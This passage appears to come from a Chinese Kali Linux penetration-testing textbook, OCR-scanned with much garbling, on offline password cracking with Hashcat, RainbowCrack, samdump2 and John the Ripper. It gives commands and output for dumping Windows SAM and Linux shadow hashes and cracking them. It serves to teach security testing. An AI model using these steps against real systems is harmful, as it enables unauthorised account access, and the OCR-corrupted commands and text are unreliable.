e 其 于 特征 (something you are) 。 这 类 认证 要 素 通 常 被 称 为 身份 
验证 的 第 三 要 素 。 相 比 前 两 者 而 言 ， 这 类 信息 的 号 份 验证 方法 更 为 安 
人 全。 然而， 已 经 出 现 了 攻击 这 种 验证 方法 的 实际 和 案例。 指纹 识别 和 视 
网 膜 识别 都 属于 验证 这 类 要 素 的 手段 。 

如 果 有 较 高 的 安全 需求 ， 就 应 当 验 证 一 个 以 上 的 验证 要 素 。 高 规 
格 的 安全 系统 往往 验证 第 一 要 素 和 第 二 要 素 。 因 为 这 种 方法 验证 了 两 
种 号 份 验 证 要 素 ， 因 此 被 称 为 双 要 素 验 证 。 

然而 不 笠 的 是 ， 我 们 的 经 难 表 明 ， 目 前 多 数 系 统 广 泛 依赖 单一 的 
密码 验证 。 作 为 渗透 测试 人 员 ， 您 应 当 在 测试 过 程 中 验证 密码 的 安全 
性 。 

根据 攻击 方式 的 不 同 ， 密 码 攻击 可 分 为 以 下 几 类 。 

e 离线 攻击 : 这 种 攻击 手段 意 在 获取 目标 主机 上 的 密码 hash X. 
件 ， 并 将 该 文件 复制 到 攻击 人 员 的 主机 。 此 后 ， 攻 击 人 员 束 可 使 用 密 
码 破 解 工 具 破 解密 码 文 件 。 这 种 方法 的 优点 是 无 须 顾 及 被 测 主机 上 的 


密码 阻止 策略 〈 账 户 锁定 等 设置 ) ， 因 为 有 关 破 解 工 作 是 在 攻击 人 员 
的 主机 上 完成 的 。 

e 在 线 攻击 : 如 果 采 用 这 种 方法 ， 攻 击 人 员 将 猜测 用 户 名 和 对 应 的 
密码 。 因 为 需要 多 次 猜测 用 户 密码 ， 所 以 这 种 方式 因为 可 能 会 触发 账 
户 锁定 等 保护 机 制 。 


10.2.1 jS L 


这 类 工具 用 于 实施 离线 密码 攻击 。 通 常情 况 下 ， 您 会 用 这 种 工具 
破解 高 权限 账户 的 密码 ， 所 以 这 些 工具 往往 用 于 纵向 提 权 。 

既然 已 经 有 了 某 种 权限 的 账户 信息 ， 为 什么 还 需要 其 他 账户 的 登 
东信 息 呢 ?在 对 菏 个 系统 进行 渗透 测试 时 ， 受 被 测 主机 配置 的 影响 ， 
所 用 账户 可 能 无 法 运行 某 些 特定 的 应 用 程序 。 这 种 情况 下 ， 您 就 无 法 
进行 下 一 步 测 试 。 但 是 ， 如 琳 使 用 常规 用 户 映 份 登 录 ， 您 束 可 以 正 篆 
运行 那些 程序 了 。 这 是 需要 获取 其 他 账户 信息 的 原因 之 一 。 

现在 的 主流 系统 在 存 铺 密码 的 时 候 都 只 保存 密码 的 hash (AA 
值 ) 。 通 过 哈 希 算法 ， 密 码 可 被 转换 为 固定 长 度 的 消息 摘要 。 这 种 转 
换 是 不 可 逆 的 单 丫 转 换 。 所 谓 单 回转 换 是 指 : 这 种 算法 可 将 既定 原始 
值 轻松 地 转换 为 某 个 哈 布 ， 而 没有 实用 的 方法 可 以 从 哈 希 值 寺 癌 推 导 
出 原始 的 输入 值 。 

过 去 ， 计 算 机 系统 保存 密码 明文 。 如 果 攻 击 人 员 获 取 到 密码 文 
件 ， 那 么 他 就 获取 了 全 部 的 密码 。 现 在 ， 即 使 攻击 人 员 获 取 了 密码 文 
件 ， 他 们 也 只 能 获取 密码 的 哈 硕 值 ， 还 是 无 法 轻易 获取 原始 密码 。 

密码 破解 是 以 穷 举 的 方式 做 哈 希 碰撞 。 如 采 所 测 密码 的 哈 布 值 与 
文件 中 的 哈 希 值 相符 ， 就 意味 着 猜测 到 了 正确 的 密码 。 

在 利用 SQL 注 入 漏洞 之 后 ， 测 试 人 员 束 可 导出 整个 数据 库 ， 继 而 
可 找到 密码 的 哈 硕 值 。 离 线 破解 工具 可 以 帮助 测试 人 员 从 哈 布 值 中 获 
取 记 录 的 原始 信息 。 


在 一 次 渗透 测试 项 目 里 ， 我 们 导出 了 整个 数据 库 。 这 个 数据 里 存 
有 整个 E-mail 系 统 的 用 户 名 和 密码 。 借 助 这 些 信 息 ， 1 
物 的 号 份 登录 到 了 E-mail 系 统 ， 并 获取 了 各 种 机 要 系统 的 账户 信息 。 

1. hash-identifier 

这 款 工 具 可 识别 哈 希 的 类 型 。 只 有 知道 被 测 系统 采用 了 什么 哈 希 

算法 ， 才 能 使 用 密码 破解 工具 破解 哈 希 值 。 有 关 hash-identifier 程 序 能 够 
支持 的 加 密 算 法 ， 请 参见 作者 的 官方 网 站 : 
http://code.google.com/p/hash-identifier/ ° 

假如 我 们 获取 了 下 述 喻 布 值 。 

d111b38c0e73bc867c4bad4023606a0e0df64c2f 

我 们 可 直接 使 用 hash-identifier 指 令 ， 并 在 HASH 值 字段 输入 哈 硕 
值 。 具 体 过 程 如 图 10.7 所 示 。 


root@kali:~# hash-identifier 
HERR ERE EE REEL EH IER IHE EAE EIER EET IHE E EIE AUI HE THERE RUE EE HERRERA RHR HH 


a eae = # 
# AV VN. £X. /É! 一 \ rs as # 
E X X AON S uH j Tk E EN M NM ANANAS # 
bi X M cus CN Fi iA th. As Oe bb # 
# VV\VA\W V X a y k Ga VN % XXX NNNM NUN E 
E X XC AN X. . & «wA / X XX V /\ X WX 3 E 
Li WIE INE INI F MF \Z / NV. f£ VIL 
# By Zion3R # 
Gi www.Blackploit.com # 
# Root@Blackploit.com # 
IHE HER EHE HIE EHE EH EEUU 8 te Oe 


HASH: d111b38c0e73bc867c4bad4023606a0e0df64c2f 


Possible Hashs: 
[+] SHA-1 
[+] MySQL5 - SHA-1(SHA-1($pass) ) 


110.7 
上 述 信 息 表 明 这 个 值 是 SHA-1 型 的 哈 希 值 。 接 下 来 ， 我 们 可 以 使 用 
Hashcat 程 序 破 解 这 个 哈 希 值 中 的 信息 。 
不 过 这 个 程序 的 可 靠 性 有 竺 提高。 我 们 可 能 会 遇 到 下 述 情 况 。 
HASH: 8846f7eaee8fb117ad06bdd830b7586c 


Possible Hashs: 

[+] MD5 

[+] Domain Cached Credentials - MD4(MD4(($pass)). 

(strtolower(Susername))) 

BI, hash-identifier 认为 这 个 值 属于 MD5 Ek MD4 型 的 哈 希 。 不 过 

这 个 哈 希 是 经 NTLM 算 法 得 来 的 。 

2. Hashcat 

Hashcat 是 一 款 免费 的 多 线程 密码 破解 工具 。 目 前 ， 它 可 破解 80 种 
算法 (http;//hashcat. net/hashcat/#features-algos) 的 哈 希 值 。Hashcat 程 
序 完 全 依赖 CPU 运算 ， 它 要 比 利 用 GPU (Graphical Processing Unit) 
运算 的 密码 破解 程序 要 慢 一 些 。 

Hastcat 文 持 6 种 攻击 模式 。 

e Straight: Fur RICE 了 读 取 数据 ， 并 把 这 些 数 据 当 
作 和 密码 的 备 克 值 。 这 是 默认 的 攻击 模式 ， 通 第 也 被 称 作 字 上 典 式 攻击 模 
式 o 

e Combination (组 合 模式 ) : Hashcat 将 会 把 字典 中 的 单词 进行 排 
列 组 合 ， 再 做 哈 希 碰撞 。 例 如， 如 有 果 字 典 中 含有 以 下 单词 

© password 

o 01 

那么 Hashcat 将 会 尝试 的 密码 将 是 : 


© passwordpassword 


© password01 

o O1password 

o 0101 

e Toggle Case ( 穷 举 大 小 写 组 合 ) : 程序 将 会 尝试 每 个 字典 单词 的 
各 种 大 小 写 组 合 。 


e Brute force (RIRA) : 程序 将 会 从 关键 字 空 间 中 取样 再 做 排 
列 组 合 。 这 种 攻击 模式 正在 被 mask attack 所 取代 。 例 如 ， 如 果 我 们 设 
定 程序 测试 A-Z 组 成 的 双 字 符 密 码 ， 那 么 Hashcat 将 会 尝 斌 AA 到 ZZ 的 
所 有 英文 字符 组 合 。 

e Permutation (排列 组 合 ) : 对 于 字典 里 每 个 备 选 密码 ， 程 序 将 会 
按照 字符 进行 各 种 排列 组 合 。 例 如 ， 如 有 条 字典 里 有 AB 这 个 备 选 密码 ， 
那么 Hashcat 将 会 测试 的 密码 如 下 : 

o AB 

o BA 

e Table-lookup ( 表 查 询 ) : 程序 将 把 字典 里 每 个 备 选 密码 的 每 个 
字符 都 当 作 对 应 的 mask 进 行 处 理 。 这 是 一 种 自动 匹配 模式 的 穷 举 攻 
iio, YE HH 和 情况 请 2 见 http//hashcat  net/wiki/doku.php? 
id-table lookup attack ° 

Hashcat 需 要 相应 的 字典 文件 。 您 可 从 下 述 链接 中 下 载 适 用 的 字 
H o 

e http://www.skullsecurity.org/wiki/index.php/Passwords ° 

e http://cyberwarzone.com/cyberwarfare/password-cracking- 
megacollection-password-cracking- word-lists ° 

e http://hashcrack.blogspot.de/p/wordlist-downloads_29.html 

e http://packetstormsecurity.com/Crackers/wordlists/ 

e http://blog.g0tmilk.com/2011/06/dictionaries-wordlists.html 

e http://www.md5decrypter.co.uk/downloads.aspx 

现在 开始 演示 Hashcat 的 适用 方法 。 

如 果 在 执行 Hashcat 的 时 候 指定 --heljp 选 项 ， 您 将 看 到 Hashcat 的 帮助 
信息 。 我 们 可 通过 这 些 帮 助 信息 查看 各 个 选项 的 使 用 方法 。 

假设 我 们 获取 了 文件 名 为 testhash 的 密码 文件 ， 并 从 中 找到 了 下 述 
哈 希 值 。 


5f4dcc3b5aa765d6148327deb882cf99 

我 们 可 使 用 rockyou.txt 文 件 作 为 Hashcat 的 密码 字典 。 简 便 起 见 ， 我 
们 可 把 密码 文件 和 字典 文件 放 在 同一 个 日 录 下 。 用 pwd 指 令 查 看 当前 日 
KERE ° 

然后 我 们 通过 下 述 指令 ， 令 Hashcat 以 默认 的 攻击 方式 测试 密码 。 

hashcat -m 100 test.hash rockyou.txt 

其 中 ， 选 项 -m 100 指定 了 hash 的 类 型 为 SHA-1。 

我 们 可 看 到 图 10.8 所 示 的 信息 。 


root@kali:~/pwd# hashcat -m 100 test .hash rockyou.txt 
Initializing hashcat v0.44 by atom with 8 threads and 32mb segment-size... 


Added hashes from file test.hash: 1 (1 salts) 
Activating quick-digest mode for single-hash 


NOTE: press enter for status-screen 


H111b38c0e73bc867c4bad4023606a0e0df64c2f :password01 
ll hashes have been recovered 


图 10.8 

上 述 信 息 表 明 ， 程 序 成 功 的 破解 了 该 哈 希 值 。 即 ， 密 码 原 文 是 
password01 ° 

默认 攻击 模式 的 破解 速度 比较 快 。 如 果 密 码 字典 没有 命中 正确 的 
密码 ， 您 就 需要 党 试 其 他 的 攻击 模式 。 

Hashcat 系 列 有 很 多 密码 破解 工具 。 其 中 部 分 程序 可 以 使 用 GPU 破 
解密 码 ;， 所 以 只 要 您 的 电脑 装 有 兼容 的 GPU， 那 么 破解 速度 还 是 相当 
理想 的 。 请 注意 ， 无 法 在 VM 虚 拟 机 里 使 用 基于 GPU 破解 的 程序 ， 因 为 
在 虚拟 机 里 运行 的 程序 无 法 直接 调用 物理 主机 的 硬件。 此 外 ， 显 卡 的 
兼容 性 也 很 重要 。 要 使 用 基于 GPU 运算 的 破解 程序 ， 您 的 显卡 需要 文 
持 CUDA (NVidia 或 OpenCL (AMD) 技术 。 在 Hashcat 系 列 里 ， 支 持 
基于 GPU 运算 的 破解 程序 有 下 面 几 下 。 

e oclhashcat-lite: 它 是 一 款 基 于 GPU 运算 的 密码 破解 程序 。 在 
Hashcat 系列 工具 里 ， 它 算得 上 是 速度 最 快 的 破解 工具 。 不 过 它 文 持 的 


哈 希 算法 有 限 ( 约 30 种 ) ， 而 且 只 支持 markov、brute force 和 mask 模 
式 的 密码 攻击 。 

e oclhashcat-plus: 它 是 一 款 基 于 GPU 运算 的 密码 破解 程序 ， 支 持 
多 数 哈 希 算法 。 这 个 程序 针对 字典 式 攻 击 进行 了 各 种 优化 ， 可 同时 破 
解 多 个 哈 希 值 。oclhashcat-plus 工具 支持 的 攻击 模式 有 brute foce (以 
mask attack 模式 实现 ) 、combinator attack 、dictionary attack 、hybrid 
attack、mask attack 和 基于 规则 的 攻击 。 

如 需 详细 了 解密 码 字 典 的 有 关 情 况 ， 请 参见 : 

e Hybrid attack (  https;//hashcat.net/wiki/doku. ^ php? 
id-hybrid attack) 

e Mask attack (http://hashcat.net/wiki/doku. php?id-mask. attack) 

e Rule-basedattack ( http://hashcat.net/wiki/doku. ^ php? 
id-rule based attack) 

3. RainbowCrack 

彩虹 表 破 解 (RainbowCrack) 是 利用 彩虹 表 来 破解 哈 希 数据 的 工 
具 。 它 实现 了 由 Philippe Oechslin$é (A Hy“ EJ zs JR] PRAY [A] HEAR EAE 9 

如 需 详 细 了 解 这 种 技术 ， 请 参见 Philippe Oechslin 8276 X Making 
aFaster Cryptanalytic Time-Memory — Trade-Off: — http://lasec.epfl. 
ch/pub/lasec/doc/Oech03.pdf 
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码 的 备 选 值 (字典 里 的 密码 ) 的 哈 希 值 ， 然 后 再 将 计算 出 来 的 哈 希 值 
与 获取 到 的 哈 硕 值 进行 对 比 。 如 采 这 两 个 值 相等 ， 则 可 确定 哈 硕 值 的 
原始 内 容 即 是 密码 ， 否 则 就 说 明 密码 不 正确 。 

彩虹 表 破 解法 的 效率 也 高 于 雄 力 破解 法 。 这 是 因为 暴力 破解 法 必 
须 计 算 字 典 内 容 的 哈 希 值 ， 然 后 进行 匹配 。 而 使 用 “以 空间 换 时 间 ” 技 
术 的 彩虹 表 破 解法 ， 事 先 束 计算 好 了 字典 各 项 的 哈 希 值 ， 破 解 过程 只 
是 简单 的 数值 比较 ， 所 以 效率 更 高 。 


请 注意 : RainbowCrack 程 序 速度 不 快 ， 而 且 不 文 持 多 线程 。 人 们 
已 经 修改 了 这 个 程序 ， 使 之 支持 多 线程 技术 和 部 分 显卡 采用 的 CUDA 
技术 。 读 者 可 从 下 列 地 址 下 载 这 个 改进 版 的 rcrack 的 程序 ， https://www. 
freerainbowtables.com/en/download/ ° 

Kali Linux 收 未 了 RainbowCrack 的 三 大 工具 。 在 破解 哈 硕 时 ， 您 必 
须 依 次 使 用 这 些 工具 。 

e rtgen: 生成 彩虹 表 的 程序 。 生 成 彩虹 表 的 计算 过 程 也 被 称 为 彩 
虹 表 的 预计 算 阶 段 。 彩 虹 表 包含 字典 、 哈 布 值 、 哈 布 算法 、 字 符 集 以 
及 字典 的 长 度 范 围 。 彩 虹 表 的 预计 算 相 当 费 时 。 但 是 生成 彩虹 表 之 
后 ， 彩 虹 表 破解 法 将 比 暴 力 破 解法 的 效率 要 高 上 不 少 。rtgen 程序 支持 
的 算法 有 LanMan、NTLM、MD2、MD4、MD5、SHA1 以 及 
RIPEMD160 ° 

e rtsort: 对 rtgen 生成 的 彩虹 表 进 行 排序 的 工具 。 

ercrack: 利用 彩虹 表 查 找 哈 希 值 的 工具 。 

如 需 启动 生成 彩虹 表 的 rtgen 工 具 ， 可 在 终端 窗口 中 执行 下 壕 指 


& o 


# rtgen 

上 述 指令 将 会 显示 简单 的 使 用 说 明 ， 以 及 两 个 指令 范例 。 

本 例 将 使 用 这 个 程序 制作 两 个 彩虹 表 ， 并 使 其 符合 下 述 要 求 。 
e hash algorithm (算法 ) : md5 

e charset (字符 集 ) : loweralpha 

e plaintext len min: 1 

e plaintext lan max: 5 

e rainbow table index: 0 

e rainbow chain length: 2000 

e rainbow chain count: 8000 


e part index: 0 


依照 以 上 要 求 ， 制 作 第 一 个 彩虹 表 所 需 的 指令 如 下 所 示 。 
# rtgen md5 loweralpha 1 5 0 2000 8000 testing 
此 后 ， 屏 幕 上 会 显示 图 10.9 所 示 的 信息 。 


root@kali:~# rtgen md5 loweralpha 1 5 0 2000 8000 0 
rainbow table md5 loweralpha#1-5 O 2000x8000 0.rt parameters 
hash algorithm: md5 
hash length: 16 
charset : abcdefghijklmnopqrstuvwxyz 
charset in hex: 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 7 
6 77 78 79 7a 
charset length: 26 
plaintext length range: 1 - 5 
reduce offset: 0x00000000 
plaintext total: 12356630 
sequential starting point begin from © (0x0000000000000000) 
generating... 
000 of 8000 rainbow chains generated (0 m 10.2 s) 


图 10.9 
第 一 个 彩虹 表 的 文件 名 为 md5_loweralpha#1-5_0_2000x8000_0.rt, 
并 被 保存 在 目录 /usr/share/rainbowcrack/ 之 下 。 
制作 第 二 个 彩虹 表 所 需 的 指令 如 下 所 示 。 


# rtgen md5 loweralpha 1 5 1 2000 8000 0 

在 作者 的 系统 中 ， 生 成 上 述 两 个 彩虹 表 总 耗 时 为 3 分 钟 左右 。 第 
二 个 彩虹 表 被 保存 为 md5_loweralpha#1-5_1_2000x8000_0.rt 文 件 。 

请 注意 ， 彩 虹 表 的 制作 过 程 十 分 耗 时 ， 而 且 彩 虹 表 文件 非常 大 。 
如 果 需 要 估算 彩虹 表 的 耗 时 情况 ， 可 使 用 Winrtgen (http://www.oxid.it/ 
downloads/winrtgen.zip) 程序 。 

Winrtgen 是 Windows 的 应 用 程序 。 若 要 在 Kali Linux HiT E, w 
需要 使 用 Wine 环 境 。 

如 果 不 想 目 己 制作 彩虹 表 ， 您 可 以 从 网 上 下 载 一 些 现成 的 彩虹 
表 。 例 如 ， 下 壕 网 站 就 提供 了 彩虹 表 下 载 服 务 : 

e http://www.freerainbowtables.com/en/tables/; 


e http://rainbowtables.shmoo.com/ ° 


Winrtgen 程 序 的 图 形 界 面 如 图 10.10 所 示 。 
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r- Table properties 


Key space: 12356630 keys 


Disk space: 250 KB (125 KB each table} 
Success probability: 0.864161 (86.42%) 

m Benchmark — — 

Hash speed 1566415 hash/sec 

Step speed 1145737 step/sec 

Table precomputation time: 13.9648 seconds 
Total precomputalion time: 27.9296 seconds 
Max cryptanalysis lime: 3.4912 seconds 


Benchmark | 


图 10.10 

rtsort 

HEX A 应 当 对 其 进行 排序 。 此 时 可 选用 id da 

大 要 在 指令 行 中 局 动 rtsort 程 序 ， 可 在 终端 中 执行 下 述 指 

# rtsort 

上 述 指令 将 会 显示 人 简单 的 使 用 说 明 以 及 指令 范例 。 在 本 例 中 ， 我 
们 将 通过 下 述 指令 对 第 一 个 彩虹 表 进 行 排序 。 

# rtsort md5 loweralphaz1-5 0 2000x8000 0.rt 

md5 loweralphaz1-5 0 2000x8000 O0.rt: 

1176928256 bytes memory available 

loading rainbow table... 

sorting rainbow table by end point... 


writing sorted rainbow table... 


然后 ， 采 取 相 同 的 操作 对 第 二 个 彩虹 表 进 行 排序 。 

# rtsort md5_loweralpha#1-5_1_2000x8000_0.rt 

md5_loweralpha#1-5_1_2000x8000_0.rt: 

1177255936 bytes memory available 

loading rainbow table... 

sorting rainbow table by end point... 

writing sorted rainbow table... 

rtsort 工 具 会 用 排序 的 结果 徐 盖 原文 件 。 

在 rtsort 程 序 的 运行 期 间 ， 请 耐心 等 待 程序 结束 。 切 幻 中 断 程序 ， 
否则 将 会 破坏 彩虹 表 文 件 。 

接 下 来 ,我们 将 使 用 5 个 字符 字典 的 彩虹 表 磁 撞 〈 破 解 ) 密码 的 
MD5 哈 希 值 。 请 注意 ， 因 为 我 们 使 用 了 两 个 彩虹 表 ， 所 以 成 功率 大 约 


78696 ° 
rcrack 
要 在 指令 行 中 启动 rcrack 程 序 ， 可 在 终端 中 执行 下 述 指令 。 
# rcrack 


上 述 指令 将 会 在 屏幕 上 显示 简单 的 使 用 说 明 以 及 指令 范例 。 
本 次 将 破解 abcde 的 MDS 散 #7] {E ab56b4d 
92b40713acc5af89985d4b786 ° 
# rcrack /usr/share/rainbowcrack/*.rt -h 
ab56b4d92b407 1 3acc5af89985d4b786 
上 述 指令 的 运行 结果 如 图 10.11 所 示 。 


1150032256 bytes memory available 

2 x 128000 bytes memory allocated for table buffer 

32008 bytes memory allocated for chain traverse 

disk: /usr/share/rainbowcrack/md5 Loweralpha#1-5 © 2000x8000 O.rt: 128000 bytes read 
disk: /usr/share/rainbowcrack/md5 Loweralpha#l - -5 1 ~ 2066x8000 | Q.rt: 128000 bytes read 
Searching for 1 hash. 

plaintext of ab56b4d92b40713acc5af89985d4b786 is abcde 

disk: thread aborted 


statistics 
laintext found: 1 of 1 
otal time: 2.07 s 
time of chain traverse: 1.88 s 
time of alarm check: 0.16 s 
time of wait: 0.00 s 
time of other operation: 0.03 s 
time of disk read: 0.00 s 
pan & reduce calculation of chain traverse: 1998000 
ash & reduce calculation of alarm check: 208984 
number of alarm: 704 
speed of chain traverse: 1.06 million/s 
speed of alarm check: 1.28 million/s 


b56b4d92b40713acc5af89985d4b786 abcde hex:6162636465 
图 10.11 


上 述 结 果 表 明 ，rcrack 程 序 成 功 地 破解 〈 碰 撞 ) 了 给 定 哈 希 值 的 明 
文 。 整 个 破解 过 程 的 耗 时 大 约 为 2 秒 

rcrack 的 改进 版 本 叫做 rcracki_mt (https://www.freerain bowtables. 
com/en/download/) 。 改 进 版 支持 混合 (hybrid ) 和 索引 (indexed) 
表 ， 并 且 采 用 了 多 线程 技术 。 

4. samdump2 

Windows 2K/NT/XP/Vista 系统 的 账户 密码 ， 以 哈 希 值 的 形式 储存 
ES SAM 的 文件 型 数据 E 里 ©  samdunip2 

( http://sourceforge.net/projects/ophcrack/files/samdump2/) 可 破解 这 种 

哈 希 。 无 需 SysKey (System Key) , samdump2 程序 就 可 破解 密码 的 哈 
AIE ° SysKey z= MH Windows NT Service Pack 3 引入 的 概念 ， 它 是 保护 
Windows SAM 数 据 库 的 加 密 密 钥 。 

如 需 启 动 samdump2， 可 在 命令 行 中 输入 如 下 命令 。 


# samdump2 

上 述 指令 将 会 显示 简单 的 使 用 说 明 。 

获取 Windows 密 码 哈 希 值 的 方法 有 很 多 。 

e 第 一 种 方法 : 直接 使 用 samdump2 程序 分 析 Windows 系统 和 SAM 
文件 。 有 关 信 息 都 保存 在 c:\%windows%\system32\config H K F ° 4% 
过 ， 在 Windows 运 行 期 间 ， 该 日 录 被 锁定 保护 。 所 以 ， 可 通过 Linux 
Live CD (例如 Kali Linux) 启动 计算 机 系统 ， 然 后 挂 在 Windows 系统 
的 位 一 分 区 。 在 此 之 后 ， 您 融 可 以 把 Windows 的 SAM 文 件 复制 到 Kali 主 
机 上 。 

e 第 二 种 方法 : 使 用 pwdump 程 序 或 同类 型 的 相关 工具 把 Windows 
账户 的 密码 哈 希 值 导 出 来 。 

e 第 三 种 方法 : 参见 上 一 章 Meterpreter 脚本 的 使 用 方法 ， 再 执行 
hashdump 命 令 把 密码 的 哈 硕 值 导出 来 。 使 用 这 种 方法 的 前 提 是 您 首先 
要 成 功利 用 好 主机 的 漏洞 ， 并 能 够 上 传 Meterpreter 的 脚本 。 

下 一 步 ， 我 们 将 演示 Windows XP SP3 密码 的 破解 方法 。 假 设 您 已 
经 取得 system 和 sam 文 件 ， 将 它们 以 同文 件 名 保存 在 home 目 了 永 下 ， 那 么 
破解 哈 希 值 的 命令 如 下 所 示 。 

# samdump2 system sam -o test-sam 

通过 上 述 指令 ， 我 们 把 samdump2 的 输出 结果 保存 为 文件 test-sam ° 
这 个 文件 的 内 容 如 下 所 示 。 

Administrator:500:e52cac67419a9a22c295285c92cd06b4:b2641aea8eb 
4c00ede89c d2b7c78f6fb::: 

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b7 
3c59d7e0c08 9c0::: 

HelpAssistant: 1000:383b9c42d9d1900952ec0055e5b8eb7b:0b742054b 
da1d884809e 12b10982360b::: 


SUPPORT 388945a0:1002:aad3b435b51404eeaad3b435b51404ee:a1d 
6e496780585e33 a9ddd414755019a::: 

tedi:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b7 
3c59d7e0c08 9c0::: 

接 下 来 束 可 以 用 密码 破解 工具 破解 test-sam 文 件 的 哈 希 值 。 您 可 以 
选用 下 文 介绍 的 John 和 Ophcrack ° 

5. John 

John the Ripper/John (http://www.openwall.com/john/) 是 一 款 破 解 
密码 哈 希 的 工具 。 目 前 ， 这 款 工 具 可 以 破解 40 多 种 类 型 的 密码 哈 希 。 
它 可 破解 常见 的 DES ` MD5 ` LM ` NT ` crypt ` NETLM 和 NETNTLM 
型 哈 希 。 虽 然 破 解 哈 希 的 软件 有 很 多 ， 但 是 DES 和 crypt 型 哈 希 的 破解 
功能 使 John 成 为 一 术 独 秀 。 

如 需 启 动 John 程 序 ， 可 在 终端 中 使 用 下 述 指令 。 

# john 

上 述 指 令 将 会 在 屏幕 上 显示 人 简单 的 使 用 说 明 。 

John 的 密码 破解 模式 分 为 以 下 4 种 。 

e 字典 模式 (Wordlist mode) : 在 这 种 模式 下 ， 用 户 只 需要 提供 字 
典 文 件 (wordlist) 就 可 以 破解 密码 文件 。 字 典 文 件 是 包含 密码 备 选 值 
的 文本 文件 ， 文 件 中 的 每 行内 容 都 将 被 当 作 一 个 用 来 进行 碰撞 测试 的 
候选 密码 。 这 种 模式 具备 “ 字 词 变化 ”〈 束 是 某 种 规则 ) 的 功能 ， (这 
种 规则 ) 可 自动 套用 在 每 行 的 备 选 密码 中 ， 以 提高 破解 的 概率 。-- 
wordlist=<wordlist_ name> 选 项 用 于 指定 字典 文件 。 这 种 字典 可 以 是 您 
目 己 制作 的 字典 ， 也 可 以 是 他 人 制作 的 字典 。 许 多 网 站 都 提供 字典 下 
载 。 例 如 ， Openwall Project (John 的 官方 网 站 ) 就 提供 字典 下 载 服 
务 ， 详 情 请 参见 http://download. openwall.net/pub/wordlists/ ° 

e 简易 破解 模式 (Single crack mode) : 这 是 John 程 序 作 者 推荐 的 
应 当 首先 尝 试 的 破解 模式 。 在 这 种 模式 下 ，John 会 使 用 登录 名 、 全 名 


和 用 户 的 home 文 件 夹 名 作为 测试 的 候选 密码 ， 并 使 用 候选 密码 来 碰撞 
(破解 ， 相 应 账户 的 密码 ， 或 者 破解 使 用 相同 salt 加 密 的 密码 哈 希 。 就 
结果 而 言 ， 这 种 模式 比 字典 模式 要 快 得 多 。 

e 增强 型 破解 模式 (Incremental mode) : 这 种 模式 是 John 各 种 模 
式 里 功能 最 强大 的 破解 模式 ， 它 会 尝试 所 有 可 能 的 密码 组 合 。 不 过 ， 
如 有 果 用 户 不 设置 密码 的 测试 区 间 ， 程 序 将 会 非常 耗 时 。 测 试 区 间 由 密 
码 长 度 的 上 限 和 字符 集 的 设置 构成 。 要 这 种 破解 模式 破解 密码 ， 必 须 
指定 相应 的 破解 模块 。 程 序 预 设 的 模块 有 All、Alnum (字母 和 数 
=) ^ Alpha (字母 ) ^ Digits (BF) 和 Lanman; 您 也 可 以 根据 实际 
需要 目 定 义 一 个 测试 模块 。 

e 外 部 模式 (External mode) : 在 这 种 模式 下 ， 用 户 可 以 指定 John 
程序 使 用 外 部 (UR) 程序 破解 密码 。 如 需 使 用 这 种 模式 ， 您 首先 应 在 
配置 文件 里 创建 一 个 [ListExternal:MODE] 的 节点 (section) 。 其 中 ， 
MODE 束 是 这 种 模式 的 一 个 (任意) 名字， 而 这 个 节点 的 内 容 应 当 是 C 
语言 编写 的 生成 候选 密码 的 各 种 函数 。 以 这 种 模式 启动 程序 之 后 ， 
John 会 编译 这 个 市 点 内 的 源 代码 ， 并 使 用 它 进行 密码 破解 。 如 需 了 解 
E 2 fh. 可 访 Al Jon 的 官方 网 站 
http://www.openwall.com/john/doc/EXTERNAL.shtml ° 

如 果 没 有 明确 指定 John 的 破解 模式 ， 它 将 会 按 默 认 顺 序 进 行 破 
A. 自 完 采用 人 简易 破解 模式 ， 然 后 笑 试 字典 式 破 解 ， 最 后 进行 增强 式 
破解 。 

在 使 用 John 程 序 之 前 ， 您 首先 需要 拿 到 包含 密码 信息 的 哈 希 文 
件 。UNIX 一 类 的 操作 系统 ， 密 码 哈 项 多 数 都 你 存在 shadow 文 件 和 
passwd 文 件 里 。 另 外 ， 只 有 root 级 别 的 用 户 才 能 要 读 取 shadow 文 件 。 

在 获取 密码 信息 文件 之 后 ， 您 需要 对 这 些 文 件 做 一 些 处 理 ; 否则 
John 无 法 破解 其 中 的 哈 希 。 好 在 John 提 供 的 unshadow 程 序 可 进行 这 种 处 
理 。 


我 从 Metasploitable2 的 虚拟 机 中 提取 出 /etc/shadow 和 /etc/passwd， 然 
后 把 它们 放 在 同一 个 目录 里 ， 并 分 别 重 命名 为 etc-shadow 和 etc- 
passwd。 然 后 ， 我 使 用 下 述 指 令 将 shadow 和 passwd 文 件 进行 合并 处 
PD 

# unshadow etc-passwd etc-shadow > pass 

以 下 是 pass 文 件 的 部 分 内 容 。 

root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9L id.:0:0:root:/root:/bin/bash 

sys:$1$fUXGBPOt$Miyc3UpOzQJqz4s5wFD910:3:3:sys:/dev:/bin/sh 

klog:$1$f2Z VMS4K$R9XkI.CmLdHhdUE3X9jqP0:103:104::/home/kl 
og:/bin/false 

msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA .ihZjA5/:1000:1000:msf 
admin,,,:/home/msfadmin:/bin/bash 

postgres:$1$Rw35ik.xX$MgQgZUuO5pAoUVvfJhfcYe/:108:117:PostgreS 
QL administrator,,,:/var/lib/postgresql:/bin/bash 

user:$1$HESu9xrH$k.03G93DGoXIiQKkPmUgZ0:1001:1001:justa 
user, 111,,:/home/user:/bin/bash 

service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:1002:1002:,,,:/home 
/service:/bin/bash 

第 二 个 字段 为 空 的 行 ， 没 有 密码 信息 。 可 删除 这 些 行 以 加 快 密码 
破解 的 速度 。 

可 使 用 下 述 指令 破解 密码 ; 其 中 ，pass 就 是 需要 破解 的 密码 文件 ， 
也 就 是 刚刚 合并 处 理 的 那个 文件 。 


# john pass 
如 果 John 程 序 能 够 破解 这 些 密码 ， 它 就 会 把 破解 的 密码 储存 为 
john.pot ° 


如 需 查 看 破解 出 来 的 密码 ， 可 使 用 下 述 指令 。 


# john --show pass 


在 本 例 中 ，John 快 速 地 破解 出 了 多 个 密码 ， 并 返回 图 10.12 所 示 的 
2: Eo 


Ava 
root@kali:~/pwd# john pass 
